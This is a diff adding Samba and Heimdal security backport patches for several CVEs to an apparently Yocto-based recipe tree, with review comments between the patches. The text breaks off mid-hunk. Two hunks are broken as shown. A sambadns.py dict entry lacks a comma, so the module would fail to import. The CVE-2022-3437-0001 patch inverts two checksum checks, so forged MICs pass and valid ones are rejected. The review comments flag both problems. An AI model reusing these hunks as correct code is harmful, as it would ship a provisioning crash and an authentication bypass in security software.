@@ -0,0 +1,64 @@ +From 74a508b39e6fd5036a2adc99d559bd3852f8ce8d Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:34:15 +0100 +Subject: [PATCH] CVE-2018-14628: s4:setup: set the correct + nTSecurityDescriptor on the CN=Deleted Objects container + +This revealed a bug in our dirsync code, so we mark +test_search_with_dirsync_deleted_objects as knownfail. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 7f8b15faa76d05023c987fac2c4c31f9ac61bb47) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/74a508b39e6fd5036a2adc99d559bd3852f8ce8d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/setup/provision.ldif | 1 + + source4/setup/provision_configuration.ldif | 1 + + source4/setup/provision_dnszones_add.ldif | 1 + + 3 files changed, 3 insertions(+) + +diff --git a/source4/setup/provision.ldif b/source4/setup/provision.ldif +index 5d9eba4..7f966fd 100644 +--- a/source4/setup/provision.ldif ++++ b/source4/setup/provision.ldif +@@ -34,6 +34,7 @@ isDeleted: TRUE + isCriticalSystemObject: TRUE + showInAdvancedViewOnly: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + # Computers located in "provision_computers*.ldif" + # Users/Groups located in "provision_users*.ldif" +diff --git a/source4/setup/provision_configuration.ldif b/source4/setup/provision_configuration.ldif +index 53c9c85..8fcbddb 100644 +--- a/source4/setup/provision_configuration.ldif ++++ b/source4/setup/provision_configuration.ldif +@@ -14,6 +14,7 @@ description: Container for deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + # Extended rights + +diff --git a/source4/setup/provision_dnszones_add.ldif 
b/source4/setup/provision_dnszones_add.ldif +index 860aa4b..a2d6b6b 100644 +--- a/source4/setup/provision_dnszones_add.ldif ++++ b/source4/setup/provision_dnszones_add.ldif +@@ -8,6 +8,7 @@ description: Deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + dn: CN=LostAndFound,${ZONE_DN} + objectClass: top +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch new file mode 100644 index 0000000000..b0a8ef2535 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch 
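Review bot: The commit message of this patch says the new descriptor exposes a dirsync bug and that `test_search_with_dirsync_deleted_objects` is marked knownfail, yet its diffstat touches only the three provisioning LDIF files. Patch 0003 also describes itself as preparation for a following dirsync change. The CVE-2018-14628 series added here ends at 0006, and none of the six patches contains that follow-up. It is worth confirming against upstream whether a dirsync fix belongs in the backport; without it, DirSync searches over `CN=Deleted Objects` may behave differently once `nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR}` is provisioned.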
@@ -0,0 +1,98 @@ +From 46a168c9a89e82ccaf8d27669d1ae5459f7becb9 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:33:37 +0100 +Subject: [PATCH] CVE-2018-14628: python:provision: make + DELETEDOBJECTS_DESCRIPTOR available in the ldif files + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 0c329a0fda37d87ed737e4b579b6d04ec907604c) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/46a168c9a89e82ccaf8d27669d1ae5459f7becb9] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/provision/__init__.py | 5 +++++ + python/samba/provision/sambadns.py | 4 ++++ + 2 files changed, 9 insertions(+) + +diff --git a/python/samba/provision/__init__.py b/python/samba/provision/__init__.py +index e8903ad..0c52cc1 100644 +--- a/python/samba/provision/__init__.py ++++ b/python/samba/provision/__init__.py +@@ -79,6 +79,7 @@ from samba.provision.backend import ( + LDBBackend, + ) + from samba.descriptor import ( ++ get_deletedobjects_descriptor, + get_empty_descriptor, + get_config_descriptor, + get_config_partitions_descriptor, +@@ -1441,6 +1442,8 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + msg["subRefs"] = ldb.MessageElement(names.configdn, ldb.FLAG_MOD_ADD, + "subRefs") + ++ deletedobjects_descr = b64encode(get_deletedobjects_descriptor(names.domainsid)).decode('utf8') ++ + samdb.invocation_id = invocationid + + # If we are setting up a subdomain, then this has been replicated in, so we don't need to add it +@@ -1472,6 +1475,7 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + "FOREST_FUNCTIONALITY": str(forestFunctionality), + "DOMAIN_FUNCTIONALITY": str(domainFunctionality), + "NTDSQUOTAS_DESCRIPTOR": ntdsquotas_descr, ++ "DELETEDOBJECTS_DESCRIPTOR": deletedobjects_descr, + 
"LOSTANDFOUND_DESCRIPTOR": protected1wd_descr, + "SERVICES_DESCRIPTOR": protected1_descr, + "PHYSICALLOCATIONS_DESCRIPTOR": protected1wd_descr, +@@ -1536,6 +1540,7 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + "RIDAVAILABLESTART": str(next_rid + 600), + "POLICYGUID_DC": policyguid_dc, + "INFRASTRUCTURE_DESCRIPTOR": infrastructure_desc, ++ "DELETEDOBJECTS_DESCRIPTOR": deletedobjects_descr, + "LOSTANDFOUND_DESCRIPTOR": lostandfound_desc, + "SYSTEM_DESCRIPTOR": system_desc, + "BUILTIN_DESCRIPTOR": builtin_desc, +diff --git a/python/samba/provision/sambadns.py b/python/samba/provision/sambadns.py +index 8a5d8a9..61beb16 100644 +--- a/python/samba/provision/sambadns.py ++++ b/python/samba/provision/sambadns.py +@@ -41,6 +41,7 @@ from samba.dsdb import ( + DS_DOMAIN_FUNCTION_2016 + ) + from samba.descriptor import ( ++ get_deletedobjects_descriptor, + get_domain_descriptor, + get_domain_delete_protected1_descriptor, + get_domain_delete_protected2_descriptor, +@@ -245,6 +246,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + domainzone_dn = "DC=DomainDnsZones,%s" % domaindn + forestzone_dn = "DC=ForestDnsZones,%s" % forestdn + descriptor = get_dns_partition_descriptor(domainsid) ++ deletedobjects_desc = get_deletedobjects_descriptor(domainsid) + + setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), { + "ZONE_DN": domainzone_dn, +@@ -268,6 +270,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + "ZONE_DNS": domainzone_dns, + "CONFIGDN": configdn, + "SERVERDN": serverdn, ++ "DELETEDOBJECTS_DESCRIPTOR": b64encode(deletedobjects_desc).decode('utf8'), + "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc).decode('utf8'), + "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc).decode('utf8'), + }) +@@ -288,6 +291,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + "ZONE_DNS": forestzone_dns, + "CONFIGDN": configdn, + "SERVERDN": serverdn, ++ 
"DELETEDOBJECTS_DESCRIPTOR": b64encode(deletedobjects_desc).decode('utf8') + "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc).decode('utf8'), + "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc).decode('utf8'), + }) +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch new file mode 100644 index 0000000000..d92ad41df1 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch 
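Review bot: In the last `sambadns.py` hunk (`@@ -288,6 +291,7 @@`), the added `"DELETEDOBJECTS_DESCRIPTOR"` entry has no trailing comma, unlike the identical entry added in the `@@ -268,6 +270,7 @@` hunk. As shown here, the dict literal would not parse and `samba.provision.sambadns` would fail to import, which breaks provisioning. The line should read `"DELETEDOBJECTS_DESCRIPTOR": b64encode(deletedobjects_desc).decode('utf8'),`. The enclosing `setup_add_ldif` call in `setup_dns_partitions` continues outside the hunk, so check the patch file itself in case the comma was lost when the page was rendered.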
@@ -0,0 +1,51 @@ +From e884fc791e59bd6ebd41b4a2ab7c9d7dc45415f4 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:30:59 +0100 +Subject: [PATCH] CVE-2018-14628: python:descriptor: add + get_deletedobjects_descriptor() + +samba-tool drs clone-dc-database was quite useful to find +the true value of nTSecurityDescriptor of the CN=Delete Objects +containers. + +Only the auto inherited SACL is available via a ldap search. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 3be190dcf7153e479383f7f3d29ddca43fe121b8) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/e884fc791e59bd6ebd41b4a2ab7c9d7dc45415f4] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/descriptor.py | 10 ++++++++++ + 1 file changed, 10 insertions(+) + +diff --git a/python/samba/descriptor.py b/python/samba/descriptor.py +index 08cfab0..0141f38 100644 +--- a/python/samba/descriptor.py ++++ b/python/samba/descriptor.py +@@ -52,6 +52,16 @@ def get_empty_descriptor(domain_sid, name_map={}): + # "get_schema_descriptor" is located in "schema.py" + + ++def get_deletedobjects_descriptor(domain_sid, name_map=None): ++ if name_map is None: ++ name_map = {} ++ ++ sddl = "O:SYG:SYD:PAI" \ ++ "(A;;RPWPCCDCLCRCWOWDSDSW;;;SY)" \ ++ "(A;;RPLC;;;BA)" ++ return sddl2binary(sddl, domain_sid, name_map) ++ ++ + def get_config_descriptor(domain_sid, name_map={}): + sddl = "O:EAG:EAD:(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)" \ + "(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)" \ +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch new file mode 100644 index 0000000000..6610899458 --- /dev/null 
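Review bot: `get_deletedobjects_descriptor()` is added without a docstring or comment, although the SDDL literal is the substance of the CVE fix and is hard to audit as a bare string. A comment above the `sddl =` assignment would make the intended access explicit, for example `# Owner/group SYSTEM; protected DACL (PAI): SY gets the read/write/create/delete rights, BA only RP and LC`. A one-line docstring stating that it returns the binary security descriptor for the `CN=Deleted Objects` containers would match how the function is used by the other patches in the series.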
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch 
@@ -0,0 +1,72 @@ +From f9ec7002cdd526ae84fbacbf153162e118f22580 Mon Sep 17 00:00:00 2001 +From: Nicolas Williams <nico@twosigma.com> +Date: Wed Mar 9 10:18:52 2022 -0600 +Subject: [PATCH] spnego: CVE-2021-44758 send_reject when no mech selected + + This fixes a DoS where an initial SPNEGO token that has no acceptable + mechanisms causes a NULL dereference in acceptors. + + send_accept() when called with a non-zero 'initial_response' did + not handle the case of gssspnego_ctx.preferred_mech_type equal + to GSS_C_NO_OID. + + The failure to handle GSS_C_NO_OID has been present since the + initial revision of gssapi/spnego, + 2baa7e7d613c26b2b037b368931519a84baec53d but might not have + been exercised until later revisions. + + The introduction of opportunistic token handling in + gss_accept_sec_context(), 3c9d3266f47f594a29068c9d629908e7000ac663, + introduced two bugs: + + 1. The optional mechToken field is used unconditionally + possibly resulting in a segmentation fault. + + 2. If use of the opportunistic token is unsuccessful and the + mech type list length is one, send_accept() can be called + with 'initial_response' true and preferred mech set to + GSS_C_NO_OID. + + b53c90da0890a9cce6f95c552f094ff6d69027bf ("Make error reporting + somewhat more correct for SPNEGO") attempted to fix the first + issue and increased the likelihood of the second. + + This change alters the behavior of acceptor_start() so it calls + send_reject() when no mechanism was selected. 
+ +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/f9ec7002cdd526ae84fbacbf153162e118f22580] +CVE: CVE-2021-44758 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../heimdal/lib/gssapi/spnego/accept_sec_context.c | 14 ++++++++------ + 1 file changed, 8 insertions(+), 6 deletions(-) + +diff --git a/lib/gssapi/spnego/accept_sec_context.c b/lib/gssapi/spnego/accept_sec_context.c +index 3a51dd3..b60dc19 100644 +--- a/lib/gssapi/spnego/accept_sec_context.c ++++ b/lib/gssapi/spnego/accept_sec_context.c +@@ -619,13 +619,15 @@ acceptor_start + if (ret == 0) + break; + } +- if (preferred_mech_type == GSS_C_NO_OID) { +- HEIMDAL_MUTEX_unlock(&ctx->ctx_id_mutex); +- free_NegotiationToken(&nt); +- return ret; +- } ++ } ++ ++ ctx->preferred_mech_type = preferred_mech_type; + +- ctx->preferred_mech_type = preferred_mech_type; ++ if (preferred_mech_type == GSS_C_NO_OID) { ++ send_reject(minor_status, output_token); ++ HEIMDAL_MUTEX_unlock(&ctx->ctx_id_mutex); ++ free_NegotiationToken(&nt); ++ return ret; + } + + /* +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch new file mode 100644 index 0000000000..e94d5d538b --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch 
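Review bot: The diffstat in this patch names `.../heimdal/lib/gssapi/spnego/accept_sec_context.c`, but the `diff --git` paths are `a/lib/gssapi/spnego/accept_sec_context.c`, i.e. relative to the Heimdal tree rather than the Samba source root. Unless the `SRC_URI` entry for this patch sets a matching `patchdir=` (not visible in this hunk), it will not apply at the default strip level. CVE-2022-3437-0001.patch further down uses the same `lib/gssapi/...` form. In the code itself, the return value of `send_reject()` is dropped and the function returns the earlier `ret`, so it is worth confirming that `ret` cannot be 0 on this path; `acceptor_start` begins and ends outside the hunk.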
@@ -0,0 +1,44 @@ +From 53838682570135b753fa622dfcde111528563c2d Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 16 Jun 2023 12:28:47 +0200 +Subject: [PATCH] CVE-2022-2127: ntlm_auth: cap lanman response length value + +We already copy at most sizeof(request.data.auth_crap.lm_resp) bytes to the +lm_resp buffer, but we don't cap the length indicator. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15072 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +CVE: CVE-2022-2127 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/53838682570135b753fa622dfcde111528563c2d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/utils/ntlm_auth.c | 8 ++++++-- + 1 file changed, 6 insertions(+), 2 deletions(-) + +diff --git a/source3/utils/ntlm_auth.c b/source3/utils/ntlm_auth.c +index 02a2379..c82ea45 100644 +--- a/source3/utils/ntlm_auth.c ++++ b/source3/utils/ntlm_auth.c +@@ -574,10 +574,14 @@ NTSTATUS contact_winbind_auth_crap(const char *username, + memcpy(request.data.auth_crap.chal, challenge->data, MIN(challenge->length, 8)); + + if (lm_response && lm_response->length) { ++ size_t capped_lm_response_len = MIN( ++ lm_response->length, ++ sizeof(request.data.auth_crap.lm_resp)); ++ + memcpy(request.data.auth_crap.lm_resp, + lm_response->data, +- MIN(lm_response->length, sizeof(request.data.auth_crap.lm_resp))); +- request.data.auth_crap.lm_resp_len = lm_response->length; ++ capped_lm_response_len); ++ request.data.auth_crap.lm_resp_len = capped_lm_response_len; + } + + if (nt_response && nt_response->length) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch new file mode 100644 index 0000000000..abc778b731 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch 
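Review bot: The cap on `lm_resp_len` is applied only in `contact_winbind_auth_crap()`, which builds the request on the `ntlm_auth` client side. Any other client of the winbind pipe can still send an oversized `lm_resp_len`, so the length also has to be validated where winbindd receives the request. No winbindd-side change is part of this patch, and it is the only CVE-2022-2127 file added in this stretch of the commit. Confirm against the upstream advisory that the remaining fixes are already in the packaged Samba version or are backported as well; otherwise marking the CVE as patched would overstate the coverage.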
@@ -0,0 +1,77 @@ +From f6edaafcfefd843ca1b1a041f942a853d85ee7c3 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:13 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Use constant-time memcmp() for arcfour + unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/f6edaafcfefd843ca1b1a041f942a853d85ee7c3] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/arcfour.c | 16 ++++++++-------- + 1 file changed, 8 insertions(+), 8 deletions(-) + +diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c +index a61f768..4fc46ce 100644 +--- a/lib/gssapi/krb5/arcfour.c ++++ b/lib/gssapi/krb5/arcfour.c +@@ -365,7 +365,7 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + return GSS_S_FAILURE; + } + +- cmp = ct_memcmp(cksum_data, p + 8, 8); ++ cmp = (ct_memcmp(cksum_data, p + 8, 8) == 0); + if (cmp) { + *minor_status = 0; + return GSS_S_BAD_MIC; +@@ -385,9 +385,9 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + _gsskrb5_decode_be_om_uint32(SND_SEQ, &seq_number); + + if (context_handle->more_flags & LOCAL) +- cmp = memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4) != 0); + else +- cmp = memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4) != 0); + + memset(SND_SEQ, 0, sizeof(SND_SEQ)); + if (cmp != 0) { +@@ -656,9 +656,9 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + _gsskrb5_decode_be_om_uint32(SND_SEQ, &seq_number); + + if (context_handle->more_flags & LOCAL) +- cmp = memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4) != 0); + else +- cmp = memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4); 
++ cmp = (ct_memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4) != 0); + + if (cmp != 0) { + *minor_status = 0; +@@ -730,7 +730,7 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + return GSS_S_FAILURE; + } + +- cmp = ct_memcmp(cksum_data, p0 + 16, 8); /* SGN_CKSUM */ ++ cmp = (ct_memcmp(cksum_data, p0 + 16, 8) == 0); /* SGN_CKSUM */ + if (cmp) { + _gsskrb5_release_buffer(minor_status, output_message_buffer); + *minor_status = 0; +@@ -1266,9 +1266,9 @@ _gssapi_unwrap_iov_arcfour(OM_uint32 *minor_status, + _gsskrb5_decode_be_om_uint32(snd_seq, &seq_number); + + if (ctx->more_flags & LOCAL) { +- cmp = memcmp(&snd_seq[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&snd_seq[4], "\xff\xff\xff\xff", 4) != 0); + } else { +- cmp = memcmp(&snd_seq[4], "\x00\x00\x00\x00", 4); ++ cmp = (ct_memcmp(&snd_seq[4], "\x00\x00\x00\x00", 4) != 0); + } + if (cmp != 0) { + *minor_status = 0; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch new file mode 100644 index 0000000000..5686df78e1 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch 
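Review bot: As backported, the two checksum comparisons are inverted: `cmp = (ct_memcmp(cksum_data, p + 8, 8) == 0);` followed by `if (cmp)` returning `GSS_S_BAD_MIC` in `_gssapi_verify_mic_arcfour`, and the same pattern on `p0 + 16` in `_gssapi_unwrap_arcfour`, reject a matching checksum and let a mismatching one through. The `!= 0` form only arrives with CVE-2022-45142.patch, so this patch is unsafe on its own and the recipe has to apply CVE-2022-45142.patch after it. I would add a line to this patch header, for example `Note: depends on CVE-2022-45142.patch, which restores the sense of the two SGN_CKSUM checks`, so that 0001 is never cherry-picked alone into another branch.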
@@ -0,0 +1,35 @@ +From c9cc34334bd64b08fe91a2f720262462e9f6bb49 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:55 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Use constant-time memcmp() in + unwrap_des3() + +The surrounding checks all use ct_memcmp(), so this one was presumably +meant to as well. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c9cc34334bd64b08fe91a2f720262462e9f6bb49] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index da939c0529..61a341ee43 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -227,7 +227,7 @@ unwrap_des3 + if (ret) + return ret; + +- if (memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ ++ if (ct_memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ + return GSS_S_BAD_SIG; + p += 2; + if (ct_memcmp (p, "\x02\x00", 2) == 0) { diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch new file mode 100644 index 0000000000..55239356e4 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch 
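Review bot: The paths in this patch (`lib/gssapi/krb5/unwrap.c`) are relative to the Heimdal tree root rather than to the Samba source tree the recipe unpacks, so it only applies if its `SRC_URI` entry sets a matching `patchdir=`; the recipe change is not visible in this part of the commit. The same holds for CVE-2022-3437-0001 and -0003 to -0008, CVE-2022-41916 and CVE-2022-45142. Please check that each entry reads like `file://CVE-2022-3437-0002.patch;patchdir=<heimdal subdirectory>` and that do_patch reports no fuzz or offset, because `unwrap_des` and `unwrap_des3` contain near-identical code and a hunk that applies loosely can land in the wrong function.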
@@ -0,0 +1,50 @@ +From a587a4bcb28d5b9047f332573b1e7c8f89ca3edd Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:42 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Don't pass NULL pointers to memcpy() + in DES unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/a587a4bcb28d5b9047f332573b1e7c8f89ca3edd] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 14 ++++++++------ + 1 file changed, 8 insertions(+), 6 deletions(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index 61a341ee43..d3987240dd 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -180,9 +180,10 @@ unwrap_des + output_message_buffer->value = malloc(output_message_buffer->length); + if(output_message_buffer->length != 0 && output_message_buffer->value == NULL) + return GSS_S_FAILURE; +- memcpy (output_message_buffer->value, +- p + 24, +- output_message_buffer->length); ++ if (output_message_buffer->value != NULL) ++ memcpy (output_message_buffer->value, ++ p + 24, ++ output_message_buffer->length); + return GSS_S_COMPLETE; + } + #endif +@@ -374,9 +375,10 @@ unwrap_des3 + output_message_buffer->value = malloc(output_message_buffer->length); + if(output_message_buffer->length != 0 && output_message_buffer->value == NULL) + return GSS_S_FAILURE; +- memcpy (output_message_buffer->value, +- p + 36, +- output_message_buffer->length); ++ if (output_message_buffer->value != NULL) ++ memcpy (output_message_buffer->value, ++ p + 36, ++ output_message_buffer->length); + return GSS_S_COMPLETE; + } 
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch
new file mode 100644
index 0000000000..4e750f0dc6
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch
@@ -0,0 +1,57 @@ +From c758910eaad3c0de2cfb68830a661c4739675a7d Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:53:45 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Avoid undefined behaviour in + _gssapi_verify_pad() + +By decrementing 'pad' only when we know it's safe, we ensure we can't +stray backwards past the start of a buffer, which would be undefined +behaviour. + +In the previous version of the loop, 'i' is the number of bytes left to +check, and 'pad' is the current byte we're checking. 'pad' was +decremented at the end of each loop iteration. If 'i' was 1 (so we +checked the final byte), 'pad' could potentially be pointing to the +first byte of the input buffer, and the decrement would put it one +byte behind the buffer. + +That would be undefined behaviour. + +The patch changes it so that 'pad' is the byte we previously checked, +which allows us to ensure that we only decrement it when we know we +have a byte to check. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c758910eaad3c0de2cfb68830a661c4739675a7d] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 86085f5695..4e3fcd659e 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -193,13 +193,13 @@ _gssapi_verify_pad(gss_buffer_t wrapped_token, + if (wrapped_token->length < 1) + return GSS_S_BAD_MECH; + +- pad = (u_char *)wrapped_token->value + wrapped_token->length - 1; +- padlength = *pad; ++ pad = (u_char *)wrapped_token->value + wrapped_token->length; ++ padlength = pad[-1]; + + if (padlength > 
datalen) + return GSS_S_BAD_MECH; + +- for (i = padlength; i > 0 && *pad == padlength; i--, pad--) ++ for (i = padlength; i > 0 && *--pad == padlength; i--) + ; + if (i != 0) + return GSS_S_BAD_MIC; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch new file mode 100644 index 0000000000..d6ea22e3df --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch @@ -0,0 +1,37 @@ +From 414b2a77fd61c26d64562e3800dc5578d9d0f15d Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:53:55 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check the result of + _gsskrb5_get_mech() + +We should make sure that the result of 'total_len - mech_len' won't +overflow, and that we don't memcmp() past the end of the buffer. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/414b2a77fd61c26d64562e3800dc5578d9d0f15d] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 4e3fcd659e..031a621eab 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -80,6 +80,10 @@ _gssapi_verify_mech_header(u_char **str, + + if (mech_len != mech->length) + return 